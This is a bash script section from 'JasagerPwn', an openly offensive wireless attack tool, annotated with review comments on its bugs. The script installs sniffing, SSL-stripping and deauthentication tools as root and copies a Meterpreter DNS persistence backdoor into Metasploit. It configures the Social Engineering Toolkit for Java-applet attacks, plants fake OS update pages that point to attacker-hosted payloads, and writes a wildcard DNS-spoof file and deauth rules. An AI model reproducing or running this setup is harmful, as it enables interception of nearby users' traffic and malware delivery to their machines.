apache2phpcheck=`dpkg -l | grep “libapache2-mod-php5” | awk ‘{print $2}’ | head -n 1`

dsniffcheck=`dpkg -l | grep dsniff | awk ‘{print $2}’ | head -n 1`

php5check=`dpkg -l | grep php5 | awk ‘{print $2}’ | head -n 1`

phpPearcheck=`dpkg -l | grep php-pear | awk ‘{print $2}’ | head -n 1`

macchangerCheck=`dpkg -l | grep macchanger | awk ‘{print $2}’ | head -n 1`

aircrackCheck=`dpkg -l | grep aircrack | awk ‘{print $2}’ | head -n 1`

sleep 1

# t records that the "missing dependencies" banner was already printed.
t=”0”

# Prints the banner once if anything is missing. The elif arms are only
# evaluated when the first test is false, where t is still 0, so their
# "$t -eq 0" term never changes the outcome.
if [ ! $dhcp3check ] || [ ! $apache2check ] || [ ! $apache2phpcheck ] || [ ! $dsniffcheck ] || [ ! $phpPearcheck  ] ||[ ! $php5check ] || [ ! $macchangerCheck ] || [ ! -e “/usr/bin/airdrop-ng” ] || [ ! -e $SETpath/src/payloadgen/pefile.py ]; then 

  echo && echo -e “\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now…” && echo

  t=”1”

elif [ ! -e “/usr/local/bin/sslstrip” ] && [ ! -e “/usr/bin/sslstrip” ] && [ $t -eq 0 ]; then

  echo && echo -e “\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now…” && echo

elif [ ! $aircrackCheck ] && [ ! -e “/usr/local/bin/aircrack-ng” ] && [ $t -eq 0 ]; then

  echo && echo -e “\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now…” && echo

fi

# dhcp3-server check

# Install each missing distribution package with `apt-get -y`, one xterm per
# package. -y answers every prompt, so the host's package set is changed
# without confirmation and the result of each install is not checked.
# `update-rc.d -f <service> remove` takes the freshly installed service out of
# the boot sequence.
if [ ! $dhcp3check ]; then

  echo -e “\e[01;31m[!]\e[00m No dhcp3-server was detected… Installing..”

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove”

fi

# dsniff check

if [ ! $dsniffcheck ]; then

  echo -e “\e[01;31m[!]\e[00m No Dsniff suite was detected… Installing..”

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “sudo apt-get -y install dsniff”

fi

# apache2 check

# The PHP module is only considered when apache2 itself was found; on a host
# missing both, this run installs apache2 and leaves the module for a later run.
if [ ! $apache2check ]; then

  echo -e “\e[01;31m[!]\e[00m No apache2 server was detected… Installing..”

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “sudo apt-get -y install apache2 && update-rc.d -f apache2 remove”

elif [ ! $apache2phpcheck ]; then

  echo -e “\e[01;31m[!]\e[00m No apache2 PHP5 module was detected… Installing..”

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “sudo apt-get -y install libapache2-mod-php5”

fi

# php5 check

if [ ! $php5check ]; then

  echo -e “\e[01;31m[!]\e[00m No PHP5 was detected… Installing..”

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “sudo apt-get -y install php5 php5-curl”

fi

# php5pear check

if [ ! $phpPearcheck ]; then

  echo -e “\e[01;31m[!]\e[00m No PHP-Pear was detected… Installing..”

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “sudo apt-get -y install php-pear”

fi

# macchanger check

if [ ! $macchangerCheck ]; then

  echo -e “\e[01;31m[!]\e[00m No Macchanger was detected… Installing..”

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “sudo apt-get -y install macchanger”

fi

# aircrack-ng check

# Skipped when either dpkg lists an aircrack package or a locally built binary
# exists under /usr/local/bin.
if [ ! $aircrackCheck ] && [ ! -e “/usr/local/bin/aircrack-ng” ]; then

  echo -e “\e[01;31m[!]\e[00m No Aircrack-ng suite was detected… Installing..”

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “sudo apt-get -y install aircrack-ng”

fi

#sslstrip check

# When no sslstrip binary is found: install its build dependencies, download a
# source tarball into /tmp, unpack it and run its setup.py.
# NOTE(review): the tarball is fetched over plain HTTP and installed with the
# privileges of this script (root is required above) without any checksum or
# signature check, so whoever controls the network path or the server controls
# code that runs as root here. A pinned digest compared with sha256sum before
# the tar step would close that gap.
# NOTE(review): /tmp/sslstrip-0.8* are fixed names in a world-writable
# directory; wget -q hides download failures and none of the steps is checked.
if [ ! -e “/usr/local/bin/sslstrip” ] && [ ! -e “/usr/bin/sslstrip” ]; then

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “sudo apt-get -y install python-twisted-web python-twisted-web2 linux-headers-`uname -r` build-essential gcc g++”

  wget -q -P “/tmp” http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz 

  tar xf /tmp/sslstrip-0.8.tar.gz -C “/tmp/” && sleep .5

  chmod -R +x /tmp/sslstrip-0.8/*.py

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “cd /tmp/sslstrip-0.8/ && python setup.py install”

  # Removes the unpacked tree; the downloaded .tar.gz itself stays in /tmp.
  if [ -d “/tmp/sslstrip-0.8/” ]; then rm -rf /tmp/sslstrip-0.8/ ; fi

fi

#airdrop-ng check

# When /usr/bin/airdrop-ng is absent: run the installer that ships under
# /pentest if it is there, otherwise download an archive and run the installer
# from it. Both branches install the same apt package list first.
if [ ! -e “/usr/bin/airdrop-ng” ]; then

  if [ -e “/pentest/wireless/aircrack-ng/scripts/airdrop-ng/install.py” ]; then

    xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “apt-get -y install linux-headers-$(uname -r) build-essential make patch autoconf python python-dev make patch gettext autoconf python-psyco subversion tcl8.5 openssl zlib1g zlib1g-dev libssh2-1-dev libssl-dev libnl1 libnl-dev libpcap0.8 libpcap0.8-dev python-scapy cracklib-runtime”

    chmod +x /pentest/wireless/aircrack-ng/scripts/airdrop-ng/install.py

    xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “cd /pentest/wireless/aircrack-ng/scripts/airdrop-ng/ && python install.py” && sleep .5

    xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “airdrop-ng -u OUIUPDATE”

  else

    echo -e “\e[01;31m[!]\e[00m Cant Find Airdrop-ng Installer in /pentest.. Ill get it for you now..”

    # NOTE(review): same integrity gap as any unauthenticated download - the
    # archive comes over plain HTTP from a third-party host and its install.py
    # is then run with this script's privileges, with no digest or signature
    # check in between.
    # mkdir has no -p, so it fails when /pentest is missing or the directory
    # already exists; the failure is not checked.
    mkdir /pentest/wireless/

    wget -q -P “/pentest/wireless/” http://info-s3curity.com/jasagerpwn/airdrop-ng.tar.gz

    # No -C here: the archive is unpacked into the current working directory,
    # while the chmod below expects /pentest/wireless/airdrop-ng/ - confirm.
    tar xf “/pentest/wireless/airdrop-ng.tar.gz”

    xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “apt-get -y install linux-headers-$(uname -r) build-essential make patch autoconf python python-dev make patch gettext autoconf python-psyco subversion tcl8.5 openssl zlib1g zlib1g-dev libssh2-1-dev libssl-dev libnl1 libnl-dev libpcap0.8 libpcap0.8-dev python-scapy cracklib-runtime”

    chmod +x /pentest/wireless/airdrop-ng/install.py

    xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “cd /pentest/wireless/airdrop-ng/ && python install.py” && sleep .5

    # The other branch runs "airdrop-ng -u OUIUPDATE"; the leading "cd" here
    # looks like a leftover - confirm.
    xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version -  Dependencies Installation” -e “cd airdrop-ng -u OUIUPDATE”

    rm -f “/pentest/wireless/airdrop-ng.tar.gz”

  fi

fi

#metasploit check

# Require the two external frameworks this script drives. When either is
# missing an error is printed and cleanup (defined elsewhere) is called.
if [ ! -e “$msfpath/msfconsole” ]; then echo && echo -e “\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: “$msfpath”” && echo && cleanup; fi

#SET check

if [ ! -e “$SETpath/set-automate” ]; then

    echo && echo -e “\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: “$SETpath”” && echo && cleanup

else

  # python pefile module - thanks redmeat_uk

  # Downloads pefile.py into the SET tree when it is not there yet.
  # NOTE(review): plain-HTTP download with no digest or signature check, and
  # the file is made executable inside a tool that is run as root; fixed
  # /tmp names are used for the archive and the unpacked tree.
  if [ ! -e “$SETpath/src/payloadgen/pefile.py” ]; then

    echo -e “\e[01;31m[!]\e[00m No Python PEfile module was detected… Installing..”

    # Clears a stale archive and unpacked tree from an earlier run.
    if [ -e “/tmp/pefile-1.2.10-102.tar.gz” ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi

    wget -q -P “/tmp” http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz

    tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/

    # $SETpath is unquoted in the next two commands; a path with spaces splits.
    mv /tmp/pefile-1.2.10-102/pefile.py $SETpath/src/payloadgen/

    chmod +x $SETpath/src/payloadgen/pefile.py

    # Success is judged only by the file being present afterwards; both
    # messages are printed with the same red "[!]" prefix.
    if [ -e “$SETpath/src/payloadgen/pefile.py” ]; then

      echo -e “\e[01;31m[!]\e[00m Installation Complete!”

    elif [ ! -e “$SETpath/src/payloadgen/pefile.py” ]; then

      echo -e “\e[01;31m[!]\e[00m Installation Failed!”

    fi

    if [ -d “/tmp/pefile-1.2.10-102/” ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi

  fi

fi

#Put up monitor interface

# Try to bring up the monitor interface $MIFACE from $WIFACE, up to three
# attempts. moncheck is the 4th byte of the interface name as printed by
# ifconfig (cut -b 4), so the loop ends as soon as a line matching $MIFACE
# yields a non-empty 4th character; after three attempts cleanup is called.
# NOTE(review): moncheck is not initialised here; if it is already set when
# this point is reached the loop body never runs.
monAttempts=”0”

while [ ! $moncheck ];

do

  if [ $monAttempts -ge “3” ]; then echo -e “\e[01;31m[!]\e[00m FATAL: Couldn’t Start $MIFACE” && cleanup; fi

  # This first assignment is overwritten after airmon-ng runs below.
  moncheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

  xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Start $MIFACE” -e “airmon-ng start $WIFACE”

  moncheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

  monAttempts=$(($monAttempts+1))

done

#copy over DNS compatable persistence script for backdoor

# Copies a script from this tool's source tree into the Metasploit
# installation when it is not there yet. The source path is relative, so it
# depends on the current working directory. The added file under
# $msfpath/scripts/meterpreter/ remains after this tool exits and marks a
# Metasploit install that this script has modified.
if [ ! -e “$msfpath/scripts/meterpreter/persistence_dns.rb” ]; then cp src/resources/persistence_dns.rb “$msfpath/scripts/meterpreter/” ; fi

#cleanup www folders

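# Remove and recreate the three web roots ($Gwww, $Jwww, $Fwww) so every run
# starts from empty directories.
# An empty or unset variable would turn "$Gwww/" into "/", which exists, and
# the unquoted "rm -rf $Gwww/" would then be aimed at the filesystem root.
# Each path is therefore required to be non-empty, expanded with ${var:?} in
# the destructive command, quoted, and preceded by "--" to end option parsing.
for www_dir in "$Gwww" "$Jwww" "$Fwww"; do

  if [ -n "$www_dir" ] && [ -d "$www_dir/" ]; then rm -rf -- "${www_dir:?}/"; fi

done

sleep .5 #Copy over new WWW sites

# Same creation order as before: java page, google page, fake-update page.
for www_dir in "$Jwww" "$Gwww" "$Fwww"; do

  if [ -n "$www_dir" ] && [ ! -d "$www_dir" ]; then mkdir -- "$www_dir/"; fi

done

unset www_dir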

#backup old default index.html

# Move the host's existing default page out of the way. Only one of the two
# names is handled per run (index.htm wins), and an earlier *.OLD backup is
# overwritten without a check.
# For anyone restoring the host afterwards: the original page is at
# /var/www/index.htm.OLD or /var/www/index.html.OLD.
if [ -e /var/www/index.htm ]; then

    mv /var/www/index.htm /var/www/index.htm.OLD

elif [ -e /var/www/index.html ]; then

    mv /var/www/index.html /var/www/index.html.OLD

fi

#remove old version stuff

# Deletes the web root and Apache site file left by an older version of this
# tool ("pyjasager").
if [ -d “/var/www/pyjasager/” ] ; then rm -rf “/var/www/pyjasager/” ; fi

if [  -e “/etc/apache2/sites-available/pyjasager” ]; then rm -f “/etc/apache2/sites-available/pyjasager” ; fi

#Check for updates

# Compare the remote revision ($googleRev) with the local one ($rev); both are
# set elsewhere in this script. Nothing is printed when $googleRev is empty.
# NOTE(review): the values are unquoted in numeric tests, so a non-numeric
# $googleRev (for example an error page from the lookup) makes "[" fail with
# an error instead of taking a branch.
if [ ! $googleRev ]; then

   echo -n

elif [ $googleRev -gt $rev ]; then

   echo

   echo -e “\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u”

   echo

elif [ $googleRev -lt $rev ]; then

   echo

   echo -e “\e[01;31m[!]\e[00m UPDATE: JasagerPwn Revisions have been RESET, Please Re-Download It!”

   # The suggested checkout uses plain HTTP, so the fetched code is not
   # authenticated in transit.
   echo -e “\e[01;31m[!]\e[00m Command: svn checkout http://jasagerpwn.googlecode.com/svn/trunk/ jasager-pwn”

   echo

fi

# Read the SET configuration file and remember, for each setting this script
# changes, the line number it sits on (grep -n) and whether it already has the
# wanted value (plain grep; non-empty means "already set").
echo -e “\e[01;32m[>]\e[00m Creating scripts…”

#Dynamic line number varaibles incase set_config changes in future updates, which it does and will.

# Each grep may match more than one line; the variable then holds several
# numbers separated by newlines.
SETapache=`cat $SETpath/config/set_config | grep -n “APACHE_SERVER” | awk -F: ‘{print $1}’`

SETapacheDIR=`cat $SETpath/config/set_config | grep -n “APACHE_DIRECT” | awk -F: ‘{print $1}’`

SETredirect=`cat $SETpath/config/set_config | grep -n “AUTO_REDIRECT” | awk -F: ‘{print $1}’`

SETmetscript=`cat $SETpath/config/set_config | grep -n “METERPRETER_MULTI_SCRIPT” | awk -F: ‘{print $1}’`

# Unlike the others, this one is located by the full "=OFF" text, so it is
# empty when the setting is already ON.
SETrepeater=`cat $SETpath/config/set_config | grep -n “JAVA_REPEATER=OFF” | awk -F: ‘{print $1}’`

#SET_CONFIG Text Parsing Variables - for javapwn

APACHESVR=`cat $SETpath/config/set_config | grep “APACHE_SERVER=ON”`

APACHEDIR=`cat $SETpath/config/set_config | grep “/var/www/javapwn”`

meterpreterS=`cat $SETpath/config/set_config | grep “METERPRETER_MULTI_SCRIPT=ON”`

AREDIRECT=`cat $SETpath/config/set_config | grep “AUTO_REDIRECT=OFF”`

JREPEATER=`cat $SETpath/config/set_config | grep “JAVA_REPEATER=ON”`

#backup orignal SET config

# The pristine file is kept once as set_config.ORIGINAL and never overwritten
# by later runs; that is the copy to restore SET from.
if [ ! -e “$SETpath/config/set_config.ORIGINAL” ]; then

  cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL

fi

#Customize SET config to how we want it..

# Rewrite the SET configuration in stages. Every stage reads set_configN and
# produces set_configN+1: through sed when the setting still has to change,
# through mv when it already has the wanted value. The last stage file is then
# moved back over set_config and the leftovers are deleted.
# NOTE(review): no stage checks its exit status, and in the mv case the live
# set_config no longer exists until the final move; an interruption in between
# leaves SET without a config file (set_config.ORIGINAL is the fallback).
if [ ! “$APACHESVR” ]; then

  sed ”${SETapache}’s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g’ $SETpath/config/set_config > $SETpath/config/set_config2

elif [ “$APACHESVR” ]; then

  mv $SETpath/config/set_config $SETpath/config/set_config2

fi

sleep 1

# APACHEDIR was computed by searching for /var/www/javapwn, while the
# substitution below writes /var/www/google - confirm which one is intended.
if [ ! “$APACHEDIR” ]; then

 sed ”${SETapacheDIR}’s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g’ $SETpath/config/set_config2 > $SETpath/config/set_config3

elif [ “$APACHEDIR” ]; then

 mv $SETpath/config/set_config2 $SETpath/config/set_config3

fi

sleep 1

if [ ! “${AREDIRECT}” ]; then

  sed ”${SETredirect}’s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g’ $SETpath/config/set_config3 > $SETpath/config/set_config4

elif [ “$AREDIRECT” ]; then

  mv $SETpath/config/set_config3 $SETpath/config/set_config4

fi

sleep 1

if [ ! “${JREPEATER}” ]; then

  sed ”${SETrepeater}’s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g’ $SETpath/config/set_config4 > $SETpath/config/set_config5

elif [ “$JREPEATER” ]; then

  mv $SETpath/config/set_config4 $SETpath/config/set_config5

fi

sleep 1

# Only acts when the -a option value is 1; -eq on an empty $autoMetScript is
# an error in "[".
if [ “$autoMetScript” -eq “1” ] && [ ! “$JREPEATER” ]; then

  sed ”${SETmetscript}’s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g’ $SETpath/config/set_config5 > $SETpath/config/set_config6

elif [ “$autoMetScript” -eq “1” ] && [ “$JREPEATER” ]; then

  # In this case the previous stage moved set_config4 to set_config5, so the
  # input named here may no longer exist - TODO confirm.
  sed ”${SETmetscript}’s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g’ $SETpath/config/set_config4 > $SETpath/config/set_config5

fi

sleep 1

#move config to right spot

if [ -e “$SETpath/config/set_config6” ]; then

   mv $SETpath/config/set_config6 $SETpath/config/set_config

fi

# The first two arms perform the same move; if set_config6 was already moved
# above and set_config5 still exists, set_config5 replaces it again here.
if [ “$autoMetScript” -eq “0” ] && [ -e “$SETpath/config/set_config5” ] ; then

    mv $SETpath/config/set_config5 $SETpath/config/set_config

elif [ “$autoMetScript” -eq “1” ] && [ -e “$SETpath/config/set_config5” ] ; then

    mv $SETpath/config/set_config5 $SETpath/config/set_config

elif [ “$autoMetScript” -eq “1” ] && [ -e “$SETpath/config/set_config6” ] ; then

    mv $SETpath/config/set_config6 $SETpath/config/set_config

fi

sleep 3

#make sure we clean up

if [ -e “$SETpath/config/set_config2” ]; then rm $SETpath/config/set_config2 ; fi

if [ -e “$SETpath/config/set_config3” ]; then rm $SETpath/config/set_config3 ; fi

if [ -e “$SETpath/config/set_config4” ]; then rm $SETpath/config/set_config4 ; fi

if [ -e “$SETpath/config/set_config5” ]; then rm $SETpath/config/set_config5 ; fi

if [ -e “$SETpath/config/set_config6” ]; then rm $SETpath/config/set_config6 ; fi

#Make loop script to isnure our DNS and IP doesnt screw us if we change networks.

# Pin the host's resolver: keep a copy of /etc/resolv.conf, then start a
# background loop that rewrites it every 30 seconds with a single nameserver.
# For anyone restoring the host: the loop has to be stopped before
# /etc/resolv.conf.ORIGINAL is copied back, or the file is overwritten again.
# NOTE(review): the backup is taken unconditionally, so a second run replaces
# the real original with the already-modified file.
cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL

# NOTE(review): /tmp/resolv.sh is a fixed name in a world-writable directory
# and is executed with this script's privileges; a file or symlink placed
# there beforehand by another local user is written through or run. A
# directory from `mktemp -d`, or running the loop inline, avoids that.
echo “while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &” > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

# $! is the PID of the "bash /tmp/resolv.sh" job; the loop itself is put in
# the background inside that script, so this may not be the PID that has to be
# killed - verify.
dnsID2=`echo $!`

#Parse wwwFakeUpdate pages with our IP for java applet in fake update attack

# Replace the REPLACEMEAPPLET placeholder in the two bundled index.html pages
# with $fonIP. The pages under $SPWD/src are edited in place, so after the
# first run the placeholder is gone and the blocks below are skipped; a later
# run with a different $fonIP keeps the old address in the pages.
nixLine=`cat $SPWD/src/wwwFakeUpdate/ubuntu/index.html | grep -n REPLACEMEAPPLET | awk -F: ‘{ print $1 }’`

nixFakeUpdate=`cat $SPWD/src/wwwFakeUpdate/ubuntu/index.html | grep REPLACEMEAPPLET`

osxLine=`cat $SPWD/src/wwwFakeUpdate/osx/index.html | grep -n REPLACEMEAPPLET | awk -F: ‘{ print $1 }’`

osxFakeUpdate=`cat $SPWD/src/wwwFakeUpdate/osx/index.html | grep REPLACEMEAPPLET`

if [ “$nixFakeUpdate” ]; then

  # $fonIP is spliced into the sed program text; a value containing "!" would
  # end the substitution early.
  sed ”${nixLine}’s!http://REPLACEMEAPPLET/ubuntu/nix.bin!http://’$fonIP’/ubuntu/nix.bin!g’ $SPWD/src/wwwFakeUpdate/ubuntu/index.html > $SPWD/src/wwwFakeUpdate/ubuntu/index.html2

  # The move is not conditional on sed succeeding, so a failed sed replaces
  # the page with an empty file.
  sleep .5 && mv $SPWD/src/wwwFakeUpdate/ubuntu/index.html2 $SPWD/src/wwwFakeUpdate/ubuntu/index.html

fi

if [ “$osxFakeUpdate” ]; then

  sed ”${osxLine}’s!http://REPLACEMEAPPLET/osx/osx.bin!http://’$fonIP’/osx/osx.bin!g’ $SPWD/src/wwwFakeUpdate/osx/index.html > $SPWD/src/wwwFakeUpdate/osx/index.html2

  sleep .5 && mv $SPWD/src/wwwFakeUpdate/osx/index.html2 $SPWD/src/wwwFakeUpdate/osx/index.html

fi

# Remove the temporary copies if a move above did not happen.
if [ -e “$SPWD/src/wwwFakeUpdate/ubuntu/index.html2” ]; then rm $SPWD/src/wwwFakeUpdate/ubuntu/index.html2 ; fi

if [ -e “$SPWD/src/wwwFakeUpdate/osx/index.html2” ]; then rm $SPWD/src/wwwFakeUpdate/osx/index.html2 ; fi

#backup original SET templates

# Replace SET's stock java and google templates with this tool's pages. The
# stock index.template is renamed to index.template.ORIGINAL first; both
# branches of each "if" then run the same copy. The copy sources are relative
# paths, so they depend on the current working directory.
# For anyone restoring SET: the stock templates are the *.ORIGINAL files.
if [ -e “$SETpath/src/html/templates/java/index.template” ]; then

  mv “$SETpath/src/html/templates/java/index.template” “$SETpath/src/html/templates/java/index.template.ORIGINAL”

  cp -rf src/wwwJava/* $SETpath/src/html/templates/java/

else

  cp -rf src/wwwJava/* $SETpath/src/html/templates/java/

fi

if [ -e “$SETpath/src/html/templates/google/index.template” ]; then

  mv “$SETpath/src/html/templates/google/index.template” “$SETpath/src/html/templates/google/index.template.ORIGINAL”

  cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/

else

  cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/

fi

#Copy over our web templates

# $Gwww, $Jwww and $Fwww are unquoted; if one is empty the copy lands in "/".
cp -rf src/wwwGoogle/* $Gwww/ # google page

cp -rf src/wwwJava/* $Jwww/ # java required page

cp -rf src/wwwFakeUpdate/* $Fwww/ #FakeUpdate Page

#Change ownership of web directories

# NOTE(review): this changes the owner of everything under /var/www/,
# including any site that was on the host before, to the web server account;
# content the server previously could only read becomes writable by it.
chown -R www-data:www-data /var/www/

#Airdrop-ng deauth configuration / rules

# Write two helper files with fixed names in /tmp: a rule file for airdrop-ng
# (deauth.conf) and a hosts-format file for dnsspoof (jasagerpwn.dns).
# NOTE(review): both are fixed names in a world-writable directory, written
# with this script's privileges; removing the old file first does not stop
# another local user from re-creating it (or a symlink) before the write.
# The a/ and d/ lines are presumably airdrop-ng allow/deny rules - confirm
# against that tool's documentation.
if [ -e “/tmp/deauth.conf” ] ; then rm “/tmp/deauth.conf” ; fi

echo “# Jasager - deauth.conf v$version

a/$ourAPmac|any

a/00:00:00:00:00:00|any

d/any|any”  > /tmp/deauth.conf

#Add our wifi gateway if needed

# MAC address of $IFACE as printed by ifconfig, upper-cased.
wifiMAC=`ifconfig $IFACE | grep “HWaddr” | awk ‘{print $5}’ | tr “[a-z]” “[A-Z]”`

# With -d 1 the access point $IFACE is associated to is appended as one more
# "a/" rule; the "»" below stands where an append redirection would be.
if [ $WiFiMODE -eq “1” ]; then

   newIFACEmac=`iwconfig $IFACE | grep “Access Point” | awk ‘{print $6}’`

   echo “a/$newIFACEmac|$wifiMAC” » /tmp/deauth.conf

fi

# DNS Hosts File. Everything to us.

# One line mapping the wildcard "*" to $fonIP; the file is passed to
# dnsspoof with -f elsewhere in this script. Its presence in /tmp is a direct
# indicator that this tool has run on the host.
if [ -e /tmp/jasagerpwn.dns ]; then rm -f /tmp/jasagerpwn.dns; fi

echo “$fonIP *” > /tmp/jasagerpwn.dns

#Vhosts javapwn

# Write an Apache virtual host named "javapwn" that serves $Jwww on port 80.
# The text between the quotes is the file content; the only expansion in it
# is $Jwww.
# Points a reviewer of the resulting configuration would note: the access
# rules use the Apache 2.2 "Order/Allow" syntax; "ErrorDocument 403 /" and
# "ErrorDocument 404 /" answer every missing or forbidden path with the site's
# front page; errors and requests go to the host's shared
# /var/log/apache2/error.log and access.log, which is where requests made to
# this site are recorded.
# The site file in /etc/apache2/sites-available/ stays on the host after the
# tool exits unless something removes it.
vhost=”/etc/apache2/sites-available/javapwn”

if [ -e “$vhost” ] ; then rm “$vhost”; fi

echo “<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Jwww

<Directory />

Options FollowSymLinks

AllowOverride None

</Directory>

<Directory $Jwww>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

<Directory “/usr/lib/cgi-bin”>

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

    Alias /doc/ “/usr/share/doc/”

    <Directory “/usr/share/doc/”>

        Options Indexes MultiViews FollowSymLinks

        AllowOverride None

        Order deny,allow

        Deny from all

        Allow from 127.0.0.0/255.0.0.0 ::1/128

    </Directory>

ErrorDocument 403 /

ErrorDocument 404 /

</VirtualHost>” » $vhost

#Vhosts google

# Write an Apache virtual host named "google" that serves $Gwww on port 80.
# The text between the quotes is the file content; the only expansion in it
# is $Gwww. Apart from the document root it has the same directives as the
# other site files this script writes: Apache 2.2 "Order/Allow" access rules,
# the front page returned for every 403/404, and logging to the host's shared
# Apache error and access logs.
# The site file in /etc/apache2/sites-available/ stays on the host after the
# tool exits unless something removes it.
vhost2=”/etc/apache2/sites-available/google”

if [ -e “$vhost2” ] ; then rm “$vhost2”; fi

echo “<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Gwww

<Directory />

Options FollowSymLinks

AllowOverride None

</Directory>

<Directory $Gwww>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

<Directory “/usr/lib/cgi-bin”>

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

    Alias /doc/ “/usr/share/doc/”

    <Directory “/usr/share/doc/”>

        Options Indexes MultiViews FollowSymLinks

        AllowOverride None

        Order deny,allow

        Deny from all

        Allow from 127.0.0.0/255.0.0.0 ::1/128

    </Directory>

ErrorDocument 403 /

ErrorDocument 404 /

</VirtualHost>” » $vhost2

#Vhosts fakeupdate

# Write an Apache virtual host named "fakeupdate" that serves $Fwww on port
# 80. The text between the quotes is the file content; the only expansion in
# it is $Fwww. It differs from the other site files this script writes in its
# last two directives: every 403/404 is answered by /index.php rather than
# "/". Requests are logged to the host's shared Apache access log.
# The site file in /etc/apache2/sites-available/ stays on the host after the
# tool exits unless something removes it.
vhost3=”/etc/apache2/sites-available/fakeupdate”

if [ -e “$vhost3” ] ; then rm “$vhost3”; fi

echo “<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Fwww

<Directory />

Options FollowSymLinks

AllowOverride None

</Directory>

<Directory $Fwww>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

<Directory “/usr/lib/cgi-bin”>

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

    Alias /doc/ “/usr/share/doc/”

    <Directory “/usr/share/doc/”>

        Options Indexes MultiViews FollowSymLinks

        AllowOverride None

        Order deny,allow

        Deny from all

        Allow from 127.0.0.0/255.0.0.0 ::1/128

    </Directory>

ErrorDocument 403 /index.php

ErrorDocument 404 /index.php

</VirtualHost>” » $vhost3

#SET automate scripts, can be TOUCHY.

#run as template rather then imported

# Write two answer files, one menu choice per line, with fixed names in /tmp.
# They are presumably fed to SET's set-automate elsewhere in this script -
# confirm at the call site. The two files differ only in the fifth value.
# NOTE(review): fixed /tmp names again; a pre-created file or symlink at these
# paths is written through with this script's privileges.
if [ -e “/tmp/auto-java2” ] ; then rm “/tmp/auto-java2” ; fi

echo -e “\n2\n1\n1\n1\n2\n16” > /tmp/auto-java2

#run as template rather then imported

if [ -e “/tmp/auto-google2” ] ; then rm “/tmp/auto-google2” ; fi

echo -e “\n2\n1\n1\n3\n2\n16” > /tmp/auto-google2

